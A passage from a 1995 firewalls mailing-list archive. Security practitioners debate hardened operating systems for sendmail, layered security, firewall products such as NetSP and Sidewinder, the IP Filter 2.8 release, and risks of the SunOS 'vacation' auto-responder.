be "real security". The question then is, how do we keep the Bad Guys from stealing us blind? -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Fri Sep 15 08:03:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03898 for firewalls-outgoing; Fri, 15 Sep 1995 07:18:46 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA03891 for ; Fri, 15 Sep 1995 07:18:42 -0700 Received: from vodka.sse.att.com by ig1.att.att.com id AA21287; Fri, 15 Sep 95 10:15:12 EDT Message-Id: <9509151415.AA21287@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Secure version of Sendmail To: jeremyp@gsms01.alcatel.com.au (Peter Jeremy) Date: Fri, 15 Sep 1995 10:11:32 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199509142155.HAA22775@gsms01.alcatel.oz.au> from "Peter Jeremy" at Sep 15, 95 07:55:53 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter, > > Rick writes: > > The purpose of nonbypassable > >access control mechanisms like Type Enforcement is to prevent the > >inevitable bugs from allowing instant and complete compromise of the > >system. > What if the bugs are in the Type Enforcement code? > > I agree that running Sendmail V8 on a B1 OS (or something similar) is > more secure than . But it > does not guarantee that there isn't a gaping hole in the OS which lets you > obtain sufficient access to wipe the audit trails and bypass the > compartmentalisation (does such a word exist?). > I'm content with "more secure", and make no claims of an absolutely secure OS. Forcing the intruder to have sendmail bug *AND* an OS bug in the "hardened" OS makes him/her work harder/longer, and gives us more time to discover the attack. Plus "hardened" OS's have more tools available with which to detect the attack. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Sep 15 08:05:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA03541 for firewalls-outgoing; Fri, 15 Sep 1995 07:09:06 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA03534 for ; Fri, 15 Sep 1995 07:09:01 -0700 Received: from vodka.sse.att.com by ig1.att.att.com id AA16148; Fri, 15 Sep 95 10:04:53 EDT Message-Id: <9509151404.AA16148@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Mulitple levels of security (was Secure version of sendmail) To: peter@nmti.com (Peter da Silva) Date: Fri, 15 Sep 1995 10:01:24 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509150138.AA18846@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 14, 95 08:38:40 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Peter de Silva Writes: > > The application writers will say "we don't need to check this stuff, the > OS will do it for us". Don't tell me they won't... I've been porting code... ... > You'll get some short term security, while you're running apps written for > C1 under B, but the application writers will get lazy. They always do. True, applications programmers can get lazy, and even the best ones may not have security in mind. That makes the secure OS *more* valuable not less. Are you trying to imply that they will be lazier because they trust a secure OS more? The lazy ones can't get any worse. If the weren't thinking about security under C1(no security) they won't bother to think less about it under B level security. > We need OS security, we need applications security, we need firewalls ... We need multiple layers of security! Adding all of the pieces together gives us more security and more time to detect an attack and hopefully prevent it from succeeding. I think that each of the following provides complementary pieces to the puzzle. 1) strong authentication and identification 2) session security (could be encryption either at the link or session level) 3) perimeter LAN security firewalls around the LAN perimeter. 4) application level security: -language support for security -application level auditing -secure databases 5) host security -system level auditing -compartmentalization of applications -protection of user from user -protection of application from application -protection of underlying OS -intrusion detection 6) physical security of plant/property & equipment 7) security training of personnel (essential) I really don't care how each level is implemented as long as its effective and supports the overall security goals. For example, there are many ways to strongly authenticate, SKEY/kerberos/smart card etc. Any of these is better than a seldom-changed password found in an English dictionary. I'm sure someone can give you a more comprehensive list than the one above, but if you omit any of those above levels, security starts to unravel. Most of my experience is in levels 3-5, but I realize that no single one of these levels will ever be a complete solution. Sometimes we all fall prey to the idea that if those application programmers would just start checking buffer lengths and checking their inputs that all these security problems would go away. No they wouldn't. We'd still have session hijacking and the rest of the problems at the other levels. Others seem to think that if we just got our firewalls and encryption right, that we'd have security. That's not true either. If the underlying hosts and PC's etc have security problems, then the holes still exist. And if the physical plant is not secured and the staff is still programming their password into a function key on the terminal, or taping a list of one-time passwords to the side of the monitor, then we're still not secure. Mark Riggins Secure Systems Engineering AT&T Bell Labs PS: If I you see another "level" that I missing in the above 7 levels, please chip in. From firewalls-owner Fri Sep 15 08:06:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05292 for firewalls-outgoing; Fri, 15 Sep 1995 07:55:30 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA05281 for ; Fri, 15 Sep 1995 07:55:25 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id JAA11534; Fri, 15 Sep 1995 09:52:00 -0500 Message-Id: <199509151452.JAA11534@psisa.com> Subject: Re: IBM NetSP To: kahar@sebank.se Date: Fri, 15 Sep 1995 09:51:59 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <0099670C.0F022E40.15@seb008.sebank.se> from "kahar@sebank.se" at Sep 15, 95 03:54:52 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings to Sweden, Katarina :) I used to live in middle Sweden for a while.. anyways :).. > I'm looking for comments and experiences with IBMs NetSP, Secured Network > Gateway version 1.2. How does it compare to other products like BorderWare > and FireWall-1? I'm working at Advantis/IBM Global Network in White Plains right now, and finishing my last hours here before I go to my new assignment in Boulder, CO. I've been building scalable, load-balanced, fault-tolerant firewalls based on NetSP SNG 1.2 here, in an effort to 'cope' with the amount of traffic from 70,000-100,00 users, which one machine obviously can't handle. Let me know what exactly you need to know about NetSP SNG even though you might not need this kind of particular 'enhancement'.. I guess, I know this product pretty well by now. :) Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz "And dsmit hailed: | _/\__ \| \ \ Pencom Systems Administration Services We shall smit thou |_| /___/|_|__\ on-site at IBM, Gov't Services, Boulder, CO forever!" From firewalls-owner Fri Sep 15 08:07:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04935 for firewalls-outgoing; Fri, 15 Sep 1995 07:44:50 -0700 Received: from Disclosure.COM (di.disclosure.com [205.156.194.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA04923 for ; Fri, 15 Sep 1995 07:44:44 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA08264; Fri, 15 Sep 95 10:45:15 EDT Date: Fri, 15 Sep 1995 10:45:13 -0400 (EDT) From: Scott Barman To: "william.wells" Cc: firewalls Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: <9509141817.AA20648@damark.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 14 Sep 1995, william.wells wrote: > As an example, it amazes me that UNIX, which predates some > proprietary systems, STILL doesn't understand what a labeled tape is THANK GOODNESS!! > and is unable to automatically associate which of several jobs wants > to use a labeled tape which was just mounted on any drive. Any operations > manager who deals with UNIX systems would love to get that. > (Especially those who have used non-UNIX mainframe systems. I've > talked to UNIX admins who don't have a clue what the above means.) Gee... when I worked for a large company whose central server was Unix, they developed a procedure that when the user requested a tape mount they would get be given access to the tape by creating a link to the device file under /mnt. All the operator did is insert/mount the tape, run a program (tmount) saying drive X was to be allocated to user U using alias A that was requested by the user. When finished, the user had access to /mnt/A, which was a symbolic link to /dev/X, whose modes and owner was changed to allow only user U to access it. The entire procedure was a shell script. There was a corresponding tumount that undid everything, made sure the tape was rewound, and, if the drive was capable, eject the tape. The operator who had a 3090 on one side and a Sun 490 on the other would rather type the created Unix tape mount than have to go through the JES2 commands needed mount the tape under MVS. > That is something which belong in the kernel but which has been > defaulted to third party developers (who also seem to not be able to > get it right). Programs and functions to read and write ANSI and IBM labeled tapes are available for free from many places on the net. Since I haven't needed them in a long time, I do not know where they are. As someone who has ported from mainframes to Unix (and is part of a MF->Unix conversion now) I can tell you this hasn't affected me! > So, put security in the kernel: hopefully it will work right. Split > privileges into more than "root" or "not-root"; allow ACLs, etc. Maybe > it will work properly in a multi-vendor environment. Fat chance! Not as long as there are vendors out there selling systems with their own vision of compatibility and conformity to standards (SCO comes to mind!). > Once you get there, though, you still have the networked SQL database > engines which bypass all of UNIX (or any other platform's) system > security by sticking their network service outside of the control of > the kernel and who knows what other applications in the future (was > that SEGA games?). Then there are the "wrappers" around those databases and other program so we users can get around certain of the very stupid licensing practices of some of these companies. (NOTE: I will not debate licensing practices in this forum. Send email directly to me if you want to argue this point). Everyone is talking gloom and doom for network security and the people involved. I think it's quite opposite. There is a heightened realization in network security that there are more people concerned (albeit, not enough). Netscape's challenge, for example, was not a futile effort in chest pounding, but a point proving example on how our (the US's) laws may be a little out of touch with reality. So you know what happened? It got a response. That's part of the problem. It basically takes the ol' "hittin' them up side the head with a 2-by-4" to get noticed. I would like to get them to notice more often, and before a disaster occurs. However, when they notice, someone has to be there to pick up the pieces. Knowing that, I will be around a while charging for this service and having those who pay me grateful I am around--captialism at its finest!! :-) scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Fri Sep 15 08:08:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05340 for firewalls-outgoing; Fri, 15 Sep 1995 07:57:50 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA05331 for ; Fri, 15 Sep 1995 07:57:45 -0700 Received: from dtw-29.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id LAA16931; Fri, 15 Sep 1995 11:19:38 -0700 Date: Fri, 15 Sep 1995 11:19:38 -0700 Message-Id: <199509151819.LAA16931@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Scott Barman From: janken@rust.net (Kenneth J. Stephens) Subject: Re: Firewall off Mortal Kombat XIV Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >On Thu, 14 Sep 1995, william.wells wrote: >>I'm looking for an HP/UX system admin: I looked at tons of resumes >>yesterday and found lots of DOS/Windows people. That tells me that our >>upcoming batch of programmers are going to base their programming >>skills on what PCs have; not great for Corporate security. People are >>struggling with the concept of changing passwords; makes transferring >>files between systems too hard. They also complain about having to >>log into individual applications. People coming from the mainframe >>shops of the 70s and 80s generally have seen security work; not so >>with people whose only experience has been single user systems. > As a person who returned as a student to University of Michigan in the early 90s the problems appear to start with the instruction. (Speaking of starting Holy Wars) As a Capacity Planner and Security Officer I spend a large amount of time trying to stay current on technology. Most of my time at U of M was spent convincing my Profs that the technology they were teaching me was outdated. My answers on exams all needed to be explained because my methods produced the correct answers but the Profs did not understand how I got the answers. Security was not covered in any of my courses. Capacity and performance programming issues were given minimal coverage in some courses. Most students were glued to their Macintosh systems and would not use an INTEL based PC unless forced to by an instructor or already owned one. UNIX lived in the engineering school only and most non-engineering students had no access to UNIX workstations and were very happy about that fact. I attended U of M because it is U of M. I was not happy with the results. Others may have seen the same problems at other schools. Client server systems will only become what the should be when the educated programmer base is large enough to support the demand. The 4 year schools will not provide the required education. We look to the 2 year community colleges to provide programmers with real world skills. Check out your local 2 year schools for good programmer training programs. You may find a good pool of programmers who have the UNIX background you need. >On Thu, 14 Sep 1995, scott barman wrote: >All I need is for someone to tell me how I can better convince people >they need to think about security without having to come up with new >politically correct ways of bashing it into them. As a gov employee (please hold your rotten tomatoes for later) who also consults on occasion, my experience is that the private sector will only be driven by the bottom line. Prove that the cost of a security breach is more than the cost of countermeasures and your budget will increase. This does not force non-management types to think about security, but it will get tools and/or staff that may force the gray matter to function. Ssdly this will not work in gov organizations. Only a good auditor seems to work in gov. You may now launch the rotten tomatoes! FYI: I attended a Reflex disknet anti-virus seminar yesterday. This product looks very very good. Does anyone have any comment/experience on this product. Please email directly if you feel this is not firewall material. I think this may be important to all of us on this list. My $.02. Ken [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Fri Sep 15 09:02:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA07529 for firewalls-outgoing; Fri, 15 Sep 1995 08:51:01 -0700 Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA07502 for ; Fri, 15 Sep 1995 08:50:49 -0700 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id IAA19714; Fri, 15 Sep 1995 08:49:25 -0700 Received: from olympics.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA29223; Fri, 15 Sep 1995 08:49:22 -0700 Received: by olympics.Eng.Sun.COM (SMI-8.6/CRAY-5.1) id IAA07613; Fri, 15 Sep 1995 08:40:02 -0700 Date: Fri, 15 Sep 1995 08:40:02 -0700 From: Brad.Powell@Eng.Sun.COM (Brad Powell) Message-Id: <199509151540.IAA07613@olympics.Eng.Sun.COM> To: firewalls@greatcircle.com, sjs@sunthing.sjsinc.com Subject: Re: Any known security holes in the "vacation" program X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sjs writes: >From firewalls-owner@GreatCircle.COM Thu Sep 14 21:49 PDT 1995 >Date: Thu, 14 Sep 1995 21:18:38 -0700 >From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) >To: firewalls@greatcircle.com >Subject: Any known security holes in the "vacation" program > >Folks: > > I'm trying to set up an auto-responder for a couple of mail aliases >on my mailhost. For the moment, because I don't really want to get involved >with majordomo or any of the other mail list programs, I am using the simple >functionality of the "/usr/ucb/vacation" program under SunOS 4.1.x. > > Given that the .forward file requires a pipe to this program, what >are the possible security implications for this setup (i.e., are there any >"well known" holes in this program)??? I wouldn't recommend it. vacation can write to files in the users home directory writing an rhosts entry jumps to mind. ======================================================================= Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc. ======================================================================= The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc. ======================================================================= From firewalls-owner Fri Sep 15 09:32:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08803 for firewalls-outgoing; Fri, 15 Sep 1995 09:17:38 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA08772 for ; Fri, 15 Sep 1995 09:17:27 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA08388; Fri, 15 Sep 1995 11:17:54 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 143390000; 15 Sep 95 12:14 CDT Received: from sctc.com by sccmailhost.sctc.com id 163910000; 15 Sep 95 12:14 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA06192; Fri, 15 Sep 1995 11:13:50 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA26436; Fri, 15 Sep 1995 11:13:49 -0500 From: Rick Smith Message-Id: <199509151613.LAA26436@shade.sctc.com> Subject: Re: Secure version of Sendmail To: Christian Kuhtz Date: Fri, 15 Sep 1995 11:13:49 -0500 (CDT) Cc: smith@sctc.com, jgt10@amdahl.com, firewalls@GreatCircle.COM In-Reply-To: <199509141914.OAA23838@psisa.com> from "Christian Kuhtz" at Sep 14, 95 02:14:35 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1733 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris asks: > So, what are you saying? The eternal bogus wisdom that there is no such thing > as a secure (including parts of it) seems to catch every single discussion > here. Get real and spare us with these academical discussions. The point of the discussion is hardly academic. It's practical. The original discussion, as I recall it, asked whether one e-mail server was somehow more secure than another. If you take the long view (say over the next 3-4 years) then they're equivalent because they do roughly the same job and have the same security limitations in general. In other words, any e-mail server software is probably going to be subject to a CERT advisory (or several) if it gets used enough. Thus, in both cases you need to constrain the server software in case it gets overrun. > You can only provide security to a certain degree, that > doesn't mean at all that your standards are neccessarily low or anything. I'd say your standards are "low" only if the organization can't afford the costs of an attack and you don't employ stronger countermeasures. Each organization makes its own tradeoff between Internet accessibility, administrative costs, and the value they place on the integrity of their internal computing systems. It is completely possible to have "terrible" security by some measure and still achieve organizational mission objectives in the face of Internet attacks. It just depends on what the organization's computers really do. The point of this mailing list is to discuss alternative security measures applied at the site boundary. It's always important to describe alternatives in the context of their relative effectiveness. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Sep 15 10:03:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09485 for firewalls-outgoing; Fri, 15 Sep 1995 09:31:43 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA09470 for ; Fri, 15 Sep 1995 09:31:33 -0700 Message-Id: <199509151631.JAA09470@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA191752584; Sat, 16 Sep 1995 02:29:44 +1000 From: Darren Reed Subject: IP Filter version 2.8 To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Sat, 16 Sep 1995 02:29:44 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2001 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Announcing IP Filter version 2.8 What is IP Filter ? Quick answer: a free packet filter which can be incorporated into any of the supported operating systems, providing packet level filtering per interface. What's that mean to me ? It means you can build it into your network servers which have more than a single ethernet interface to protect your servers and internal networks from IP spoofing and other attacks which defeat service level access control methods. Also, if you're confident enough, you can use this package to help build your own firewall. I'd recommend using the TIS Firewall Toolkit in conjunction with this package if you think you're capable of this, or using it alone to build choke routers. For more information, details and examples of filter rules, see: http://coombs.anu.edu.au/~avalon/ip-filter.html New to this release: * Solaris 2.4 (on ethernet interfaces ONLY) is now supported except for the return-rst and return-icmp options; * Can now (optionally) log the first 128 bytes of a packet (if present), including the packet header; * ipmon can now generate log entries with names in place of numerical hostname and port data by using the -N command line option; * ipmon can now optionally log output through syslog using the new -s command line option; * IPSO Basic Security Options filtering; * In-kernel filtering can be turned on/off; * Regression testing to check the correctness of the filter; * IP test program (ipsend) is now included with the package to allow the administrator to send arbitary IP packets, or replay packet sequences at the filter - runs on Linux, *BSD, Solaris2 and SunOS 4.1.x; * Compacts IP header into a directly filterable form; * Three-way filtering results, allowing packets which don't match any rule to be counted and subjected to a general policy of denial or permission; * Perl script suggesting rules (and other changes needed) that you'll need to protect yourself from IP spoofing. darren From firewalls-owner Fri Sep 15 10:05:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09754 for firewalls-outgoing; Fri, 15 Sep 1995 09:37:13 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA09737 for ; Fri, 15 Sep 1995 09:37:01 -0700 Received: from pm3-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA05288; Fri, 15 Sep 95 11:33:56 -0400 Date: Fri, 15 Sep 95 11:33:56 -0400 Message-Id: <9509151533.AA05288@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Ted Stockwell From: frankw@in.net (Frank Willoughby) Subject: Re: Secure version of Sendmail Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> Date: Thu, 14 Sep 95 18:24:43 >> From: Frank Willoughby >> Cc: firewalls@GreatCircle.COM >> >> >On the SNS Mail Guard the government evaluated the whole thing >> >including the networking and application software. >> >> The implication in the above statement is that the Mail Guard >> functions as a firewall. Not True. The SNS Mail Guard does >> *not* function as a firewall. >> >> It has another purpose. I was told by a salesman who represented >> the Sidewinder that it was blessed by the gov't powers-that-be as >> *the* gov't sanctioned firewall. Hogwash. This was a gross mis- >> representation of the product that took some time and research to >> unearth. > >[rest of complaint deleted] > >It is not clear to me what your bone of contention is. SNS is not >designed to compete directly against traditional internet firewalls. >It does have much in common with more conventional firewalls and the >SNS effort had a considerable influence on the design of Sidewinder -- >Secure Computing's firewall for the traditional internet firewall >market. I was going to drop this, but since you posted to the entire list, I have an obligation to answer you. Bones of contention: 1) The Sidewinder was claimed to firewall a number of government agencies as part of an approved configuration. Not true. The Sidewinder is not a part of this approved configuration, the SMG (Secure MailGuard) is. Two different products, two different functionalities as you point out. The problem is that this is not was represented to me. What was represented to me was that the Sidewinder was acting as a firewall in the approved configuration. I was not impressed when I found out that this was not true. 2) The Sidewinder was supposed to have the capability of reading mails when delivered and blocking mails which may have a sensitive content - based on a keyword search. It still doesn't. An acquaintance of mine from another company talked to the engineering staff at Secure Computing. According to them, the mail-reading capability won't be delivered. Ever. (Which is not necessarily in light of the censorship 3) The Sidewinder was supposed to be able to filter/restrict applications & protocols to inbound, outbound, both, or none. When it was delivered, it only had *all* or *nothing*. If ftp or telnet were turned on, *bidirectional* access was turned on. 8^( A serious security problem in my humble opinion. Granted this problem was taken care of in the last release, but it should never have happened IMHO. At the time, I had to recommend two firewalls to the management. V-ONE and Secure Computing were in the top two. Most of the firewalls I evaluated had security problems, were IP packet filter gateways (which disqualified them as an Internet firewall IMHO), had technical problems, were too expensive, too difficult (and/or expensive) to deploy on a large scale, were vaporware or any combination of the above. My personal recommendation was the V-ONE because it was the only one at the time was capable of preventing terminal session hijacking (that I evaluated). Management chose otherwise. If they had remembered to perform acceptance testing based on what was promised, the Sidewinder would probably have been returned. (I left the company before the firewall was installed). I should point out that item 1 above is based on my personal research. I know that it is true. Items 2 & 3 are based on people who are current Sidewinder customers. I have no reason to doubt the authenticity of this information. Best Regards, Frank > >There is information on our web server (http://www.sctc.com) about the >SNS program and the LOCKguard(tm) Standard Mail Guard (SMG). I would >suggest people start there when wondering what SNS is and isn't. > >-- >disclaimer: I speak only for myself, etc, etc >Ted Stockwell, stockwel@sctc.com, Sidewinder > > > From firewalls-owner Fri Sep 15 10:08:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA11021 for firewalls-outgoing; Fri, 15 Sep 1995 09:56:48 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA11014 for ; Fri, 15 Sep 1995 09:56:43 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id LAA08646; Fri, 15 Sep 1995 11:59:13 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 148120000; 15 Sep 95 12:55 CDT Received: from sctc.com by sccmailhost.sctc.com id 166840000; 15 Sep 95 12:55 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA07719; Fri, 15 Sep 1995 11:54:54 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA27791; Fri, 15 Sep 1995 11:54:53 -0500 From: Rick Smith Message-Id: <199509151654.LAA27791@shade.sctc.com> Subject: Re: Firewall off Mortal Kombat XIV To: Ted Doty Date: Fri, 15 Sep 1995 11:54:53 -0500 (CDT) Cc: smith@sctc.com, firewalls@greatcircle.com In-Reply-To: <199509151258.IAA18920@kgbvax.network.com> from "Ted Doty" at Sep 15, 95 08:58:05 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1972 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ted Doty presents a view of authentication based security which I acknowledge, appreciate, and omit duplicating. I won't quibble with specifics. I agree that strong(er) authentication is about all you can do for some sites. It's not the Final Solution and it doesn't quite fit every problem, but it's often a viable approach. Regarding the following: > > balance responsibility for security between the application and the > > kernel. Neither can do the job alone. A boneheaded developer can > > implement an application with security holes just as effectively on a > > highly secure platform as on a DOS PC. > > Or keep out the outsiders, and trust that the insiders won't mess with you > too often, but audit the access to make sure that they don't. Look, I'd > LOVE to have application developers spend real brain-sweat on security, but > even if they did, you're still stuck with holes in libc (all right ... who > out there has actually gone through all the library routines?). Actually, I was referring to developers handling security in terms of transactional integrity. In other words, a major transaction is constructed of multiple separate steps that cross check one another. A good, secure implementation doesn't rely on a single action by a single, potentially subverted source. When I look at software development and audit requirements from more mainframeish organizations, I find that such techniques were known and actively enforced in careful shops. Unfortunately, the new generation of PC developers don't usually get this message. Someone noted that security in practice has many similarities to quality assurance measures. In both cases a generic mechanism may just get in the way and make things worse instead of better. On the other hand, they can both work very effectively when they're tailored to the specific problem, and they can become tools for success instead of failure. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Sep 15 10:31:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA11294 for firewalls-outgoing; Fri, 15 Sep 1995 10:01:34 -0700 Received: from netcom21.netcom.com (netcom21.netcom.com [192.100.81.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA11281 for ; Fri, 15 Sep 1995 10:01:30 -0700 Received: by netcom21.netcom.com (8.6.12/Netcom) id JAA18708; Fri, 15 Sep 1995 09:53:51 -0700 Date: Fri, 15 Sep 1995 09:53:51 -0700 From: yevaud@netcom.com (Karl Wiebe) Message-Id: <199509151653.JAA18708@netcom21.netcom.com> To: firewalls@greatcircle.com Subject: Re: Any known security holes in the "vacation" program Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stefan: > I'm trying to set up an auto-responder for a couple of mail aliases >on my mailhost. For the moment, because I don't really want to get involved >with majordomo or any of the other mail list programs, I am using the simple >functionality of the "/usr/ucb/vacation" program under SunOS 4.1.x. Well, you are better off using procmail for this, if you are going to do it at all. One reason is simply that vacation, being designed for the simple "I'm on vacation" setup, will only respond *once* to email from a given address; this is why it maintains its "database". > Given that the .forward file requires a pipe to this program, what >are the possible security implications for this setup (i.e., are there any >"well known" holes in this program)??? Yes, the program mailer in Sendmail in many cases can be subverted. One way to guard against this hackery is the smrsh shell wrapper command ( get it from ftp.cert.org ). Also, 8.6.12 has more checks by now. For ( some ) details, see BugTraq... > BTW: I have already hard-coded a subject: line in the vacation.msg >file and do not, and will not, put any of the variable subsitiutions in it. >I have also shut down access to the "mailbots" home directory by any other >user, other than root of course. --Karl From firewalls-owner Fri Sep 15 11:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA14960 for firewalls-outgoing; Fri, 15 Sep 1995 10:58:03 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA14951 for ; Fri, 15 Sep 1995 10:57:59 -0700 Received: from calloway.bwh.harvard.edu (calloway.bwh.harvard.edu [134.174.81.46]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id NAA27117; Fri, 15 Sep 1995 13:56:45 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by calloway.bwh.harvard.edu (8.6.9) id NAA08457; Fri, 15 Sep 1995 13:45:14 -0400 Message-Id: <199509151745.NAA08457@calloway.bwh.harvard.edu> Subject: Re: IBM NetSP To: kahar@sebank.se Date: Fri, 15 Sep 1995 13:45:13 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <0099670C.0F022E40.15@seb008.sebank.se> from "kahar@sebank.se" at Sep 15, 95 03:54:52 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 